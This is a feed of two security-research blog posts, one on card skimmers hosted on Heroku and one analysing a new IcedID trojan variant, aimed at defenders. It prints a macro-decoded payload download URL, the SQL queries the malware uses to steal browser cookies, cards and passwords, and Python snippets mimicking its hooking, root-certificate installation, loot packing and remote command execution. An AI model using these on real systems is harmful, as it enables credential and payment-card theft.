There’s an app for that: web skimmers found on PaaS Heroku

Malware Bytes Security - Wed, 12/04/2019 - 11:00am

Criminals love to abuse legitimate services—especially platform-as-a-service (PaaS) cloud providers—as they are a popular and reliable hosting commodity used to support both business and consumer ventures.

Case in point, in April 2019 we documented a web skimmer served on code repository GitHub. Later on in June, we observed a vast campaign where skimming code was injected into Amazon S3 buckets.

This time, we take a look at a rash of skimmers found on Heroku, a container-based, cloud PaaS owned by Salesforce. Threat actors are leveraging the service not only to host their skimmer infrastructure, but also to collect stolen credit card data.

All instances of abuse found have already been reported to Heroku and taken down. We would like to thank the Salesforce Abuse Operations team for their swift response to our notification.

Abusing cloud apps for skimming

Developers can leverage Heroku to build apps in a variety of languages and deploy them seamlessly at scale.

Heroku has a freemium model, and new users can experiment with the platform’s free web hosting services, with certain limitations. Crooked members of the Magecart cabal have been registering free accounts with Heroku to host their skimming business.

Their web skimming app consists of three components:

  • The core skimmer that will be injected into compromised merchant sites, responsible for detecting the checkout URL and loading the next component.
  • A rogue iframe that will overlay the standard payment form meant to harvest the victim’s credit card data.
  • The exfiltration mechanism for the stolen data that is sent back in encoded format.
iframe trick

Compromised shopping sites are injected with a single line of code that loads the remote piece of JavaScript. Its goal is to monitor the current page and load a second element (a malicious credit card iframe) when the current browser URL contains the Base64 encoded string Y2hlY2tvdXQ= (checkout).
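
The encoded marker is easy to verify; a minimal Python sketch (illustrative only, not the skimmer’s actual code) of the same gate logic:

```python
import base64

ENCODED_MARKER = "Y2hlY2tvdXQ="  # Base64 of "checkout", as seen in the skimmer

def is_checkout_page(url: str) -> bool:
    """Return True if the decoded marker appears in the URL,
    mimicking how the skimmer decides when to activate."""
    marker = base64.b64decode(ENCODED_MARKER).decode()
    return marker in url.lower()

print(base64.b64decode(ENCODED_MARKER).decode())  # checkout
```

Encoding the trigger string this way keeps the word “checkout” out of the script body, a small evasion against naive keyword scanning.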

The iframe is drawn above the standard payment form and looks identical to it, as the cybercriminals use the same cascading style sheet (CSS) from portal.apsclicktopay.com/css/build/easypay.min.css.

Finally, the stolen data is exfiltrated, after which victims will receive an error message instructing them to reload the page. This may be because the form needs to be repopulated properly, without the iframe this time.

Several Heroku-hosted skimmers found

This is not the only instance of a credit card skimmer found on Heroku. We identified several others using the same naming convention for their script, all seemingly becoming active within the past week.

Another one on @heroku

hxxps://stark-gorge-44782.herokuapp[.]com/integration.js. Fake form in an iframe. Data goes to hxxps://stark-gorge-44782.herokuapp[.]com/config.php?id= pic.twitter.com/Xa1F2z1Z1a

— Denis (@unmaskparasites) December 2, 2019

In one case, the threat actors may have forgotten to use obfuscation. The code shows vanilla skimming, looking for specific fields to collect and exfiltrate using the window.btoa(JSON.stringify(result)) method.
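
Since window.btoa(JSON.stringify(result)) is simply Base64-encoded JSON, an analyst can reverse a captured exfiltration blob in a couple of lines. A sketch, with invented field names standing in for whatever the skimmer collected:

```python
import base64
import json

# Hypothetical captured exfil blob (field names invented for illustration)
blob = base64.b64encode(json.dumps(
    {"number": "4111111111111111", "cvv": "123"}).encode()).decode()

def decode_exfil(b64_blob: str) -> dict:
    """Reverse btoa(JSON.stringify(...)): Base64-decode, then parse JSON."""
    return json.loads(base64.b64decode(b64_blob))

print(decode_exfil(blob)["cvv"])  # 123
```

The lack of any real encryption here is what the article means by “vanilla skimming.”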

We will likely continue to observe web skimmers abusing more cloud services, as they are a cheap (even free) commodity that can be discarded when no longer needed.

From a detection standpoint, skimmers hosted on cloud providers may cause some issues with false positives. For example, one cannot blacklist a domain used by thousands of other legitimate users. However, in this case we can easily perform fully qualified domain name (FQDN) detections and block just that malicious user.
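
A defender can express that distinction as an exact-FQDN blocklist rather than a domain blocklist; a minimal sketch using hostnames from the IOC list below:

```python
# Exact FQDNs to block -- never the shared herokuapp.com parent domain,
# which thousands of legitimate apps depend on.
BLOCKED_FQDNS = {
    "ancient-savannah-86049.herokuapp.com",
    "stark-gorge-44782.herokuapp.com",
}

def is_blocked(hostname: str) -> bool:
    """Exact-match FQDN check: blocks only the abusive subdomains."""
    return hostname.lower().rstrip(".") in BLOCKED_FQDNS
```

This is the trade-off with skimmers on shared PaaS infrastructure: detection must be precise enough to spare the legitimate tenants of the same domain.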

Indicators of Compromise (IOCs)

Skimmer hostnames on Heroku

ancient-savannah-86049[.]herokuapp.com
pure-peak-91770[.]herokuapp[.]com
aqueous-scrubland-51318[.]herokuapp[.]com
stark-gorge-44782.herokuapp[.]com

The post There’s an app for that: web skimmers found on PaaS Heroku appeared first on Malwarebytes Labs.

Categories: Malware Bytes

New version of IcedID Trojan uses steganographic payloads

Malware Bytes Security - Tue, 12/03/2019 - 1:06pm

This blog post was authored by @hasherezade, with contributions from @siri_urz and Jérôme Segura.

Security firm Proofpoint recently published a report about a series of malspam campaigns it attributes to a threat actor called TA2101. The actor originally targeted German and Italian users with Cobalt Strike and Maze ransomware; a later wave of malicious emails was aimed at the US, pushing the IcedID Trojan.

During our analysis of this spam campaign, we noticed changes in how the payload was implemented, in particular with some code rewritten and new obfuscation. For example, the IcedID Trojan is now being delivered via steganography, as the data is encrypted and encoded with the content of a valid PNG image. According to our research, those changes were introduced in September 2019 (while in August 2019 the old loader was still in use).

The main IcedID module is stored without the typical PE header and is run by a dedicated loader that uses a custom headers structure. Our security analyst @hasherezade previously described this technique in a talk at the SAS conference (Funky Malware Formats).

In this blog post, we take a closer look at these new payloads and describe their technical details.

Distribution

Our spam honeypot collected a large number of malicious emails containing the “USPS Delivery Unsuccessful Attempt Notification” subject line.

Each of these emails contains a Microsoft Word document as an attachment, allegedly coming from the United States Postal Service. The content of the document is designed to lure the victim into enabling macros by insinuating that the content has been encoded.

Having a look at the embedded macros, we can see the following elements:

There is a fake error message displayed to the victim, but more importantly, the IcedID Trojan authors have hidden the malicious instructions within a UserForm as labels.

The labels containing numerical ASCII values

The macro grabs the text from the labels, converts it, and uses it during execution:

url1 = Dcr(GH1.Label1.Caption)
path1 = Dcr(GH1.Label2.Caption)

For example:

104 116 116 112 58 47 47 49 48 52 46 49 54 56 46 49 57 56 46 50 51 48 47 119 111 114 100 117 112 100 46 116 109 112
converts to: http://104.168.198.230/wordupd.tmp

67,58,92,87,105,110,100,111,119,115,92,84,101,109,112,92,101,114,101,100,46,116,109,112
converts to: C:\Windows\Temp\ered.tmp
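
The conversion is plain decimal-ASCII-to-text. A Python equivalent of the macro’s Dcr helper (a sketch, handling both the space- and comma-separated captions seen above):

```python
import re

def dcr(caption: str) -> str:
    """Convert a list of decimal ASCII codes (space- or comma-separated)
    back into the hidden string, as the macro's Dcr function does."""
    return "".join(chr(int(n)) for n in re.split(r"[ ,]+", caption.strip()))

print(dcr("104 116 116 112"))  # http
```

Hiding strings as numeric label captions like this is a cheap way to keep URLs and file paths out of the macro source itself.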

The file wordupd.tmp is an executable downloaded with the help of the URLDownloadToFileA function, saved to the given path and run. Moving on, we will take a closer look at the functionality and implementation of the downloaded sample.

Behavioral analysis

As before, IcedID has been observed injecting into svchost and running under its cover. Depending on the configuration, it may or may not download other executables, including TrickBot.

Dropped files

The malware drops various files on the disk. For example, in %APPDATA%, it saves the steganographically obfuscated payload (photo.png) and an update of the downloader:

It also creates a new folder with a random name, where it saves a downloaded configuration in encrypted form:

Inside the %TEMP% folder, it drops some non-malicious helper elements: sqlite32.dll (that will be used for reading SQLite browser databases found in web browsers), and a certificate that will be used for intercepting traffic:

Looking at the certificate, we can see that it was signed by VeriSign:

Persistence

The application achieves persistence with the help of a scheduled task:

The task has two triggers: at the user login and at the scheduled hour.

Overview of the traffic

Most of the traffic is SSL encrypted. We can also see the use of websockets and addresses in a format such as “data2.php?<key>“, “data3.php?<key>“.

Attacking browsers

The IcedID Trojan is known as a banking Trojan, and indeed, one of its important features is the ability to steal data related to banking transactions. For this purpose, it injects its implants into browsers, hooks the API, and performs a Man-In-The-Browser attack.

Inside the memory of the infected svchost process, we can see the strings with the configuration for webinjects. Webinjects are modular: typically HTML and JavaScript code injected into a web page for the purpose of stealing data.

Webinjects configuration in the memory of infected svchost

The core bot that runs inside the memory of svchost observes processes running on the system, and injects more implants into browsers. For example, looking at Mozilla Firefox:

The IcedID implant in the browser’s memory

By scanning the process with PE-sieve, we can detect that some of the DLLs inside the browser have been hooked and their execution was redirected to the malicious module.

In Firefox, the following hooks have been installed:

  • nss3.dll : SSL_AuthCertificateHook->2c2202[2c1000+1202]
  • ws2_32.dll : connect->2c2728[2c1000+1728]

A different set was observed in Internet Explorer:

  • mswsock : hook_0[7852]->525d0[implant_code+15d0]
  • ws2_32.dll : connect->152728[implant_code+1728]

The IcedID module running inside the browser’s memory is responsible for applying the webinjects, installing malicious JavaScript into attacked pages.

Fragment of the injected script

The content of the inlined webinject script is available here: inject.js.

It also communicates with the main bot that is inside the svchost process. The main bot coordinates the work of all the injected components, and sends the stolen data to the Command and Control server (CnC).

Due to the fact that the communication is protected by HTTPS, the malware must also install its own certificate. For example, this is the valid certificate for the Bank of America website:

And in contrast, the certificate used by the browser infected by IcedID:

Overview of the changes

As we mentioned, the core IcedID bot, as well as the dedicated loader, went through some refactoring. In this comparative analysis, we used the following old sample: b8113a604e6c190bbd8b687fd2ba7386d4d98234f5138a71bcf15f0a3c812e91

The detailed analysis of this payload can be found here: [1][2][3].

The old loader vs. new

The loader of the previous version of the IcedID Trojan was described in detail here, and here. It was a packed PE file that used to load and inject a headerless PE.

The main module was injected into svchost:

The implants in the svchost’s memory

The implanted PE was divided into two sections, and the first memory page (representing the header) was empty. This type of payload is stealthier than a full PE injection (which is more common). However, it was possible to reconstruct the header and analyze the sample like a normal PE. (An example of the reconstructed payload is available here: 395d2d250b296fe3c7c5b681e5bb05548402a7eb914f9f7fcdccb741ad8ddfea).

The redirection to the implant was implemented by hooking the RtlExitUserProcess function within svchost’s NTDLL.

When svchost tried to terminate, it instead triggered a jump into the injected PE’s entry point.

The hooked RtlExitUserProcess redirects to payload’s EP

The loader was also filling the pointer to the data page within the payload. We can see this pointer being loaded at the beginning of the payload’s execution:

In the new implementation, there is one more intermediate loader element implemented as shellcode. The diagram below shows the new loading chain:

The shellcode has functionality similar to that previously implemented by the loader in the form of a PE. First, it injects itself into svchost.

Then it decompresses and injects the payload, which as before is a headerless PE (analogous to the one described here).

Comparing the core

The implementation of the core bot is modified. Yet, inside the code we can find some strings known from the previous sample, as well as a similar set of imported API functions. We can also see some matching strings and fragments of implemented logic.

Fragment of the code from the old implementation

Analogical fragment from the new sample:

Fragment of the code from the new implementation

Comparing both reconstructed samples with the help of BinDiff shows that there are quite a few differences and rewritten parts. Yet, there are parts of code that are the same in both, which proves that the codebase remained the same.

Preview of the similar functions Preview of different/rewritten functions

Let’s follow the execution flow of all the elements from the new IcedID package.

The downloader

In the current delivery model, the first element of IcedID is a downloader. It is a PE file, packed by a crypter. The packing layer changes from sample to sample, so we will omit its description. After unpacking it, we get the plain version: fbacdb66748e6ccb971a0a9611b065ac.

Internally, this executable is simple and not further obfuscated. We can see that it first queries the CnC trying to fetch the second stage, requesting a photo.png and passing a generated ID in the URL. Example:

/photo.png?id=0198d464fe3e7f09ab0005000000fa00000000

Fragment of the function responsible for generating the image URL

The downloader fetches the PNG with the encoded payload, loads the file, decodes it, and redirects execution there. Below we can see the responsible function:

Once the PNG is downloaded, it will be saved on disk and can be loaded again at system restart. The downloader will turn into a runner of this obfuscated format. In this way, the core executable is revealed only in memory and never stored on disk as an EXE file.

The “photo.png” looks like a valid graphic file:

Preview of the “photo.png”

In this fragment of code, we can see that the data from the PNG (section starting from the tag “IDAT”) is first decoded to raw bytes, and then those bytes are passed to the further decoding function.
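
IcedID’s custom decoding routine is not reproduced in text here, but the first step of such a scheme, pulling the raw IDAT data out of a PNG, is straightforward, since a PNG is an 8-byte signature followed by length/type/data/CRC chunks. A minimal sketch:

```python
import struct

def idat_payload(png_bytes: bytes) -> bytes:
    """Concatenate the raw data of all IDAT chunks in a PNG stream."""
    assert png_bytes[:8] == b"\x89PNG\r\n\x1a\n", "not a PNG"
    out, pos = b"", 8
    while pos + 8 <= len(png_bytes):
        length = struct.unpack(">I", png_bytes[pos:pos + 4])[0]
        ctype = png_bytes[pos + 4:pos + 8]
        if ctype == b"IDAT":
            out += png_bytes[pos + 8:pos + 8 + length]
        pos += 12 + length  # 4 (length) + 4 (type) + data + 4 (CRC)
    return out
```

The bytes this returns would still need the malware’s own decryption applied before they become executable code; the point is that the carrier remains a structurally valid image.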

The algorithm used for decoding the bytes:

The PNG is decrypted and injected into the downloader. In this case, the decoded content turns out to be a shellcode module rather than a PE.

The downloader redirecting the execution into the shellcode’s entry point

The loader passes one argument to the shellcode: the base address at which it was loaded.

The loader (shellcode)

As mentioned before, this stage is implemented as a position-independent code (shellcode). The dumped sample is available here: 624afab07528375d8146653857fbf90d.

This shellcode-based loader replaced the previously described (sources: [1][2]) loader element that was implemented as a PE file. First, it runs within the downloader:

As we can see from the downloader’s code, the shellcode entry point must first be fetched from a simple header that is at the beginning of the decoded module. We see that this header stores more information that is essential for loading the next element:

As this module is no longer a PE file, its analysis is more difficult. All the APIs used by the shellcode are resolved dynamically:

The strings are composed on the stack:

To make the deobfuscation easier, we can follow the obfuscated flow with the help of a PIN tracer. The log from the tracing of this stage shows APIs indicating code injection, along with their offsets:

09c;shellcode's Entry Point
69b;ntdll.LdrLoadDll
717;ntdll.LdrGetProcedureAddress
7ab;ntdll.RtlWow64EnableFsRedirectionEx
7cb;kernel32.CreateProcessA
7d6;ntdll.RtlWow64EnableFsRedirectionEx
7f0;ntdll.NtQuerySystemInformation
8aa;ntdll.NtAllocateVirtualMemory
8c6;ntdll.ZwWriteVirtualMemory
8ee;ntdll.NtProtectVirtualMemory
907;ntdll.NtQueueApcThread
916;ntdll.ZwResumeThread
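
Tracer output in this offset;API format is easy to post-process; a small illustrative helper that maps offsets to API names:

```python
def parse_trace(log: str) -> dict:
    """Map hex offsets to API names from a PIN-style 'offset;API' trace log."""
    calls = {}
    for line in log.strip().splitlines():
        offset, _, name = line.partition(";")
        calls[int(offset, 16)] = name
    return calls

trace = """69b;ntdll.LdrLoadDll
7cb;kernel32.CreateProcessA"""
print(parse_trace(trace)[0x7cb])  # kernel32.CreateProcessA
```

Sorting such a map by offset quickly surfaces injection patterns like the NtAllocateVirtualMemory → ZwWriteVirtualMemory → NtQueueApcThread sequence seen above.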

Indeed, the shellcode injects its own copy, passing its entry point to the APC Queue. This time, some additional parameters are added as a thread context.

Setting parameters of the injected thread

Once the shellcode is executed from inside svchost, an alternative path to the execution is taken. It becomes a loader for the core bot. The core element is stored in a compressed form within the shellcode’s body. First, it is decompressed.

From previous experiments, we know that the payload follows the typical structure of a PE file, yet it has no headers. Often, malware authors erase headers in memory once the payload is loaded. Yet, this is not the case. In order to make the payload stealthier, the authors didn’t store the original headers of this PE at all. Instead, they created their own minimalist header that is used by the internal loader.

First, the shellcode finds the next module by parsing its own header:

The shellcode also loads the imports of the payload:

Below, we can see the fragment of code responsible for following the custom headers definition, and applying protection on pages. After the next element is loaded, execution is redirected to its entry point.

The entry point of the next module where the function expects the pointer to the data to be supplied:

The supplied data is appended at the end of the shellcode, and contains: the path of the initial executable, the path of the downloaded payload (photo.png), and other data.

Reconstructing the PE

In order to make analysis easier, it is always beneficial to reconstruct the valid PE header. There are two approaches to this problem:

  1. Manually finding and filling all the PE artifacts, such as: sections, imports, relocations (this becomes a problem if all those elements are customized by the authors, as in the case of the Ocean Lotus sample)
  2. Analyzing in detail the loader and reconstructing the PE from the custom header

Since we have access to the loader’s code, we can go for the second, more reliable approach: Observe how the loader processes the data and reconstruct the meaning of the fields.

A fragment of the loader’s code where the sections are processed:

The custom header reconstructed based on the analysis:

Fortunately, in this case the malware authors customized only the PE header. The Data Directory elements (imports and relocations) are kept in a standard form, so this part does not need to be converted.
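
Conceptually, a converter like the linked iced_id_parser walks the custom header fields and emits the standard PE equivalents. With an invented field layout (hypothetical, not the format’s actual definition, which lives in the repository), the parsing step might look like:

```python
import struct

# Hypothetical custom-header layout, for illustration only -- the real
# field order is defined by the loader and documented in iced_id_parser.
CUSTOM_HDR = struct.Struct("<IIII")  # entry_point, import_dir_va, reloc_dir_va, n_sections

def parse_custom_header(blob: bytes) -> dict:
    """Unpack the (invented) minimal header fields a loader would need."""
    ep, imp_va, reloc_va, n_sec = CUSTOM_HDR.unpack_from(blob)
    return {"entry_point": ep, "import_dir_va": imp_va,
            "reloc_dir_va": reloc_va, "n_sections": n_sec}
```

The reconstruction work is then mechanical: emit a standard DOS/NT header, copy the section table, and point the Data Directory at the (unchanged) import and relocation tables.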

The converter from this format to PE is available here:

https://github.com/hasherezade/funky_malware_formats/tree/master/iced_id_parser

Interestingly, the old version of IcedID used a similar custom format, but with one modification. In the past, there was one more DWORD-sized field before the Import Directory VA. So, the latest header is shorter by one DWORD than the previous one.

The module in the old format: bbd6b94deabb9ac4775befc3dc6b516656615c9295e71b39610cb83c4b005354

The core bot (headerless PE)

6aeb27d50512dbad7e529ffedb0ac153 – a reconstructed PE

Looking inside the strings of this module, we can guess that this element is responsible for all the core malicious operations performed by this malware. It communicates with the CnC server, reads the sqlite databases in order to steal cookies, installs its own certificate for Man-In-The-Browser attacks, and eventually downloads other modules.

We can see that this is the element that was responsible for generating the observed requests to the CnC:

During the run, the malware is under constant supervision from the CnC. The communication with the server is encrypted.

String obfuscation

The majority of the strings used by the malware are obfuscated and decoded before use. The algorithm used for decoding is simple:

In order to decode the strings statically, we can reimplement the algorithm and feed the encoded buffers to it. Another, easier solution is a decoder that loads the original malware and calls its own decoding function on the encoded buffers, given by offset. Example available here.
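The reimplementation route can be illustrated with a rolling-XOR decoder of the kind commonly seen in this malware family. Note that the key constant and the exact key schedule below are hypothetical placeholders, not the sample's real values, which must be lifted from the disassembly:

```python
def decode_string(buf: bytes, key: int) -> bytes:
    """Rolling-XOR decoder (illustrative only; the real algorithm and
    constants come from the sample's disassembly)."""
    out = bytearray()
    for i, b in enumerate(buf):
        out.append(b ^ ((key + i) & 0xFF))
    return bytes(out)

# Round trip with a made-up key of 0x5A: XOR is its own inverse,
# so encoding and decoding use the same routine.
enc = bytes(c ^ ((0x5A + i) & 0xFF) for i, c in enumerate(b"sqlite3.dll"))
dec = decode_string(enc, 0x5A)
```

Once the routine is reimplemented, a script can walk the binary's encoded-string table and dump all strings in one pass.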

Decoding the strings is important for further analysis, especially because, in this case, we can find some debug strings left by the developers, informing us about the actions performed by the malware in particular fragments of code.

A list of some of the decoded strings is available here.

Available actions

The overview of the main function of the bot is given below:

The bot starts by opening a socket. Then, it beacons to the CnC and initializes threads for some specific actions: MiTM proxy, browser hooking engine, and a backconnect module (backdoor).

It also calls to a function that initializes handlers, responsible for managing a variety of available actions. The full list:

By analyzing the handlers more closely, we notice that, similar to the first element, the main bot retrieves various elements as steganographically protected modules. The function responsible for decoding PNG files is analogous to the one found in the initial downloader:

Those PNGs carry the content of various updates for the malware: for example, updates to the list of URLs, as well as other configuration files.
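IcedID's exact embedding scheme is implemented in its own decoding routine, but as a general illustration of how a PNG carrier can hide a payload, one common shortcut is simply appending data after the final IEND chunk. The sketch below demonstrates that simpler variant only; it is not the sample's real algorithm:

```python
def extract_appended(png: bytes) -> bytes:
    """Return any data appended after the PNG's closing IEND chunk.
    (Illustration of a generic PNG carrier, not IcedID's real scheme.)"""
    idx = png.rfind(b"IEND")
    if idx == -1:
        raise ValueError("not a PNG")
    # Skip the 4-byte chunk type and the 4-byte CRC that close IEND.
    return png[idx + 4 + 4:]

# Minimal fake PNG: signature, filler, IEND type + its real CRC, payload.
png = (b"\x89PNG\r\n\x1a\n" + b"\x00" * 16
       + b"IEND" + b"\xaeB`\x82" + b"MZ-payload")
payload = extract_appended(png)
```

A proper analysis tool would instead replicate the routine shown in the screenshot, which parses the image data itself.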

Execution flow controlled by the CnC

The malware’s backconnect feature allows the attacker to deploy various commands on the victim machine. The CnC can also instruct the bot to decode other malicious modules from inside that will be deployed in a new process. For example:

If a particular command from the CnC is received, the bot will decompress another buffer that is stored inside the sample and inject it into a new instance of svchost.

The way in which this injection is implemented reminds us of the older version of the loader. First, the buffer is decompressed with the help of RtlDecompressBuffer:

Then, memory is allocated at the preferred address 0x3000.

Some functions from NTDLL and other parameters will be copied to the structure, stored at the beginning of the shellcode.

We can see there are some functions that will be used by the shellcode to load another embedded PE.

As in the old loader, the redirection to the new entry point is implemented via a hook set on the RtlExitUserProcess function:

After the buffer gets decompressed, we can see another piece of shellcode:

This shellcode is an analogous loader for the headerless PE module. Inside, we can see the custom version of the PE header that the loader will use:

The custom header, containing minimal info from the PE header

Dumped shellcode: 469ef3aedd47dc820d9d64a253652d7436abe6a5afb64c3722afb1ac83c3a3e1

This element is an additional backdoor that deploys a hidden VNC on demand. The authors refer to it as the “HDESK bot” (Help Desk bot) because it gives the attacker direct access to the victim machine, as if it were a help-desk service. Converted to PE: 2959091ac9e2a544407a2ecc60ba941b

The “HDESK bot” deploys a hidden VNC to control the victim machine

Below, we will analyze the selected features implemented by the core bot. Note that many of the features are deployed on demand—depending on the command given by the CnC. In the observed case, the bot was also used as a downloader of the secondary malware, TrickBot.

Installing its own certificate

The malware installs its own certificate. First, it drops the generated file into the %TEMP% folder. Then, the file is loaded and added to the Windows certificate store.

Fragment of Certificate generation function:

Calling the function to add the certificate to store:
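The drop-then-register pattern can be sketched as below. The bot itself calls the CryptoAPI directly; the `certutil` command line here is only an illustration of the equivalent operation, and the file name `cert.der` is a made-up placeholder:

```python
import os
import tempfile

def build_install_cmd(cert_der: bytes) -> list:
    """Write a certificate to %TEMP% and return the certutil command
    that would add it to the Root store. (Sketch of the equivalent of
    the malware's CryptoAPI calls, not its actual implementation.)"""
    path = os.path.join(tempfile.gettempdir(), "cert.der")
    with open(path, "wb") as f:
        f.write(cert_der)
    return ["certutil", "-addstore", "Root", path]

cmd = build_install_cmd(b"\x30\x82")  # truncated DER bytes, for illustration
```

The command is only constructed here, not executed; adding a root certificate this way is what enables the Man-In-The-Browser interception described earlier.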

Stealing passwords from IE

We can see that this bot goes after various saved credentials. Among the different methods used, we identified stealing data from the Credential Store. The method used is similar to the one described here.

We can see that it uses the mentioned GUID “abe2869f-9b47-4cd9-a358-c22904dba7f7” that was used to salt the credentials. After reading the credentials from the store, the bot undoes the salting operation in order to get the plaintext.

Stealing saved email credentials

The bot is trying to use every opportunity to extract passwords from the victim machine, also going after saved email credentials.

Stealing cookies

As we observed during the behavioral analysis, the malware drops the sqlite3.dll in the temp folder. This module is further loaded and used to perform queries to browsers’ databases with saved cookies.

Fragment of code responsible for loading sqlite module

The malware searches the files containing cookies of particular browsers:

We can see the content of the queries after decoding strings:

SELECT host, path, isSecure, expiry, name, value FROM moz_cookies

It targets Firefox, as well as Chrome and Chromium-based browsers:

The list of targeted Chromium browsers

Fragment of the code performing queries:

The list of queries to Chrome’s database:

SELECT name, value FROM autofill

SELECT guid, company_name, street_address, city, state, zipcode, country_code FROM autofill_profiles

SELECT guid, number FROM autofill_profile_phones

SELECT guid, first_name, middle_name, last_name, full_name FROM autofill_profile_names

SELECT card_number_encrypted, length(card_number_encrypted), name_on_card, expiration_month || "/" ||expiration_year FROM credit_cards

SELECT origin_url,username_value,length(password_value),password_value FROM logins WHERE username_value <> ''

SELECT host_key, path, is_secure, (case expires_utc when 0 then 0 else (expires_utc / 1000000) - 11644473600 end), name, length(encrypted_value), encrypted_value FROM cookies

The list of queries to Firefox’s database:

SELECT host, path, isSecure, expiry, name, value FROM moz_cookies

SELECT fieldname, value FROM moz_formhistory
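The cookie query against Chrome's database is worth a closer look because of the inline timestamp arithmetic: Chrome stores `expires_utc` as microseconds since 1601-01-01 (the Windows FILETIME epoch), and the expression `(expires_utc / 1000000) - 11644473600` converts that to a Unix timestamp. A toy reproduction against an in-memory database:

```python
import sqlite3

# Build a minimal stand-in for Chrome's cookies table and run the exact
# query from the bot's decoded strings.
db = sqlite3.connect(":memory:")
db.execute("CREATE TABLE cookies (host_key TEXT, path TEXT, is_secure INT,"
           " expires_utc INT, name TEXT, encrypted_value BLOB)")
# 13253352000000000 us since 1601-01-01 == 1608878400 on the Unix epoch.
db.execute("INSERT INTO cookies VALUES ('.example.com', '/', 1,"
           " 13253352000000000, 'sid', x'00')")
row = db.execute(
    "SELECT host_key, path, is_secure,"
    " (case expires_utc when 0 then 0 else"
    "  (expires_utc / 1000000) - 11644473600 end),"
    " name, length(encrypted_value), encrypted_value FROM cookies"
).fetchone()
```

The `11644473600` constant is the number of seconds between 1601-01-01 and 1970-01-01; Firefox's `moz_cookies` stores `expiry` as plain Unix seconds, which is why its query needs no conversion.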

All the found files are packed into a TAR archive and sent to the CnC.

Similarly, it creates a “passff.tar” archive with stolen Firefox profiles:
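The bundling step itself is trivial; an in-memory equivalent of packing stolen files into a TAR archive before exfiltration can be sketched as follows (the file name inside the archive is made up for illustration):

```python
import io
import tarfile

def pack_loot(files: dict) -> bytes:
    """Bundle a name->bytes mapping into an in-memory TAR archive,
    mirroring the pack-and-send pattern described above."""
    buf = io.BytesIO()
    with tarfile.open(fileobj=buf, mode="w") as tar:
        for name, data in files.items():
            info = tarfile.TarInfo(name)
            info.size = len(data)
            tar.addfile(info, io.BytesIO(data))
    return buf.getvalue()

archive = pack_loot({"cookies/chrome.txt": b"sid=abc"})
```

The resulting buffer is then what gets encrypted and sent to the CnC.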

Hooking browsers

As mentioned earlier, the malware attacks and hooks browsers. Since the analogous functionality is achieved by different functions in different browsers, the set of installed hooks may be unique to each.

First, the malware searches for targets among the running processes. It uses the following algorithm:

It is similar to the one from the previous version (described here), yet we can see a few changes: the checksums are modified, and some additional checks are added. Still, the list of attacked browsers is the same, including the most popular ones: Firefox, MS Edge, Internet Explorer, and Chrome.

The browsers are first infected with the dedicated IcedID module. Just like all the modules in this edition of IcedID, the browser implant is a headerless PE file. Its reconstructed version is available here: 9e0c27746c11866c61dec17f1edfd2693245cd257dc0de2478c956b594bb2eb3.

After being injected, this module finds the appropriate DLLs in the memory of the process and sets redirections to its own code:

Parsing the instructions and installing the hooks:

Then, the selected API functions are intercepted and redirected to the plugin. Usually the hooks are installed at the beginning of functions, but there are exceptions to this rule. For example, in the case of Internet Explorer, a function within mswsock.dll has been intercepted in the middle of its body:

Looking at the elements in memory involved in intercepting the calls: the browser implant (headerless PE), and the additional memory page:

Example of the hook in Firefox:

Step 1: the function SSL_AuthCertificateHook has a jump redirecting to the implanted module:

Step 2: The implanted module calls the code from the additional page with appropriate parameters:

Step 3: The code at the additional page is a patched fragment of the original function. After executing the modified code, it goes back to the original DLL.

The functionality of this hook didn’t change from the previous version.
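The jump in Step 1 is a classic 5-byte inline hook: an `E9` (JMP rel32) opcode followed by a displacement counted from the end of the jump instruction. Computing that patch can be sketched as follows (the addresses are made-up examples):

```python
import struct

def make_jmp(hook_at: int, target: int) -> bytes:
    """Build the 5-byte relative JMP (E9 rel32) written at the start of
    a hooked function; rel32 is measured from the address of the NEXT
    instruction, i.e. hook_at + 5."""
    rel = target - (hook_at + 5)
    return b"\xe9" + struct.pack("<i", rel)

# Hypothetical addresses: hooked function in a DLL, implant in a new page.
patch = make_jmp(0x7FFA1000, 0x00560000)
```

Repairing such a hook during analysis is the reverse operation: restore the stolen original bytes (here relocated to the additional page) over the `E9` stub.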

Webinjects

The bot gets the configuration from the CnC in the form of the .DAT files mentioned before. First, the file is decoded with the RC4 algorithm. The output must start with the “zeus” keyword, and is further encoded with a custom algorithm. Scripts dedicated to each site are identified by a script ID.
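RC4 is simple enough to reimplement directly when writing a config decryptor; since RC4 is symmetric, the same routine both encrypts and decrypts, and the “zeus” magic serves as the validity check (the key `b"k3y"` below is a placeholder, not the sample's real key):

```python
def rc4(key: bytes, data: bytes) -> bytes:
    """Plain RC4 (KSA + PRGA), the first decoding layer of the .DAT
    webinject configs."""
    S = list(range(256))
    j = 0
    for i in range(256):                      # key-scheduling algorithm
        j = (j + S[i] + key[i % len(key)]) & 0xFF
        S[i], S[j] = S[j], S[i]
    out, i, j = bytearray(), 0, 0
    for b in data:                            # pseudo-random generation
        i = (i + 1) & 0xFF
        j = (j + S[i]) & 0xFF
        S[i], S[j] = S[j], S[i]
        out.append(b ^ S[(S[i] + S[j]) & 0xFF])
    return bytes(out)

# Round trip with a placeholder key: decrypting valid input must yield
# a buffer that starts with the "zeus" magic.
blob = rc4(b"k3y", b"zeus\x00example-config")
plain = rc4(b"k3y", blob)
```

In a real decryptor, the second (custom) decoding layer would then be applied to everything after the magic.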

After the files are loaded and decoded, we can see the content:

There are multiple types of webinjects that the bot can perform:

Depending on the configuration, the bot may replace some parts of the website’s code, or add some new, malicious scripts.

Executing remote commands

In case the commands implemented by the bot are not sufficient for the operator’s needs, the bot also supports executing arbitrary commands via the command line.

The output of the executed commands is sent back to the malware via a named pipe, and then relayed to the CnC.
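The execute-and-report pattern can be sketched as below. The real bot relays the child process's output through a named pipe before forwarding it to the CnC; this simplified sketch just captures and returns it:

```python
import subprocess

def run_remote_cmd(cmd: str) -> bytes:
    """Run an operator-supplied command through the shell and capture
    its combined output (simplified stand-in for the named-pipe relay
    described above)."""
    proc = subprocess.run(cmd, shell=True, capture_output=True)
    return proc.stdout + proc.stderr

out = run_remote_cmd("echo hello")
```

On Windows, the pipe-based original has the advantage of streaming output from long-running commands instead of waiting for the process to exit.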

Mature banker and stealer

As we can see from the above analysis, IcedID is not only a banking Trojan, but a general-purpose stealer able to extract a variety of credentials. It can also work as a downloader for other modules, including covert ones, that look like harmless PNG files.

This bot is mature, written by experienced developers. It deploys various typical techniques, including Zeus-style webinjects, hooks for various browsers, hidden VNC, and backconnect. Its authors also used several known obfuscation techniques. In addition, the use of customized PE headers is an interesting bonus, slowing down static analysis.

In recent updates, the malware authors equipped the bot with steganography. It is not a novelty to see it in the threat landscape, but it is a feature that makes this malware a bit more stealthy.

